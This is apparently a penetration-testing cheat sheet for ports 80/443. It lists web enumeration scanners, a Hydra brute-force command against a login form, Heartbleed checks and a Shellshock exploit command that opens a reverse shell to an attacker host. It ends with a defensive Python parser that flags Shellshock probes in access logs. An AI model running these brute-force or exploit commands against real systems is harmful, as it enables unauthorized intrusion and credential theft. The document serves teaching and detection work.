Port 80/443 – HTTP/HTTPS

How to enumerate port 80/443 (HTTP/HTTPS)


Find hidden files and directories:

# Dirb
dirb https://192.168.1.101

or

# Gobuster - drop any response codes you do not want reported (403, for example) from the -s list
gobuster -u http://192.168.1.101 -w /usr/share/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt -s '200,204,301,302,307,403,500' -e

Nikto web server scan:

nikto -h 192.168.1.101

WordPress scan:

wpscan -u 192.168.1.101/wp/

Joomla scan:

If you want to do a penetration test on a Joomla CMS, OWASP JoomScan is your best shot ever!

joomscan -u http://192.168.1.101

DAVTest:

DAVTest tests WebDAV-enabled servers by uploading test executable files and then (optionally) uploading files that allow command execution or other actions directly on the target. It is meant for penetration testers to quickly and easily determine whether enabled DAV services are exploitable.

davtest -url http://192.168.1.101

Cracking Web Forms with Hydra:

hydra -L <username list> -P <password list> <IP Address> http-post-form "<login path>:<form parameters>:<failed login message>"

For example:

hydra -L <username list> -P <password list> 192.168.1.101 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"

SSL vulnerabilities:

Always check for SSL vulnerabilities such as Heartbleed.

sslscan 192.168.1.101:443

nmap -sV --script=ssl-heartbleed 192.168.1.101

cgi-bin (ShellShock):

If you find a "cgi-bin" directory, brute force the files inside it, because the CGI scripts may be vulnerable to Shellshock. On Apache you can exploit it as follows (set the pages value to the files you discovered):

python /usr/share/exploitdb/platforms/linux/remote/34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.16.47 lport=4443 pages=/cgi-bin/user.sh
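On the defensive side, Shellshock probes leave a recognisable trace in the web server's own logs. As an added example that is not part of the original post, the Python below parses Apache combined-format access log lines, flags any request whose request line, Referer or User-Agent carries the bash function-definition marker "() {", and counts 404s under /cgi-bin/ per client, which is the footprint of the file brute-forcing described above. The log lines, IPs and paths are constructed for the example.

```python
import re
from collections import Counter
from typing import Dict, List

# Constructed Apache "combined" access-log sample (IPs and paths are made up). Apache
# writes Referer and User-Agent verbatim, so a probe placing "() {" there lands in the log.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.11 - - [10/Oct/2023:13:55:40 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 77 "-" "curl/7.68.0"
198.51.100.7 - - [10/Oct/2023:13:56:00 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:00 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 77 "-" "() { :;}; echo probe"
198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /cgi-bin/status HTTP/1.1" 404 209 "() { :;}; echo probe" "Mozilla/5.0"
"""

# client identd user [timestamp] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Shellshock fires on an environment value that starts with a function definition,
# so "() {" (whitespace optional) is the marker worth alerting on.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def find_shellshock_attempts(log_text: str) -> List[Dict[str, str]]:
    """One record per line whose request, Referer or User-Agent carries the marker."""
    hits = []
    for line in log_text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        for field in ("req", "referer", "agent"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append({"ip": m.group("ip"), "field": field,
                             "request": m.group("req"), "status": m.group("status")})
                break  # one alert per line
    return hits


def cgi_bin_404s_per_client(log_text: str) -> Dict[str, int]:
    """Count 404s under /cgi-bin/ per client: a burst of them signals CGI brute-forcing."""
    counts: Counter = Counter()
    for line in log_text.splitlines():
        m = COMBINED_RE.match(line)
        if m and m.group("status") == "404":
            parts = m.group("req").split()  # method, path, protocol
            if len(parts) == 3 and parts[1].startswith("/cgi-bin/"):
                counts[m.group("ip")] += 1
    return dict(counts)
```

Feed it a real access.log and an alert on the marker plus a high per-client 404 count under /cgi-bin/ gives you both the enumeration and the attempt from one source.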

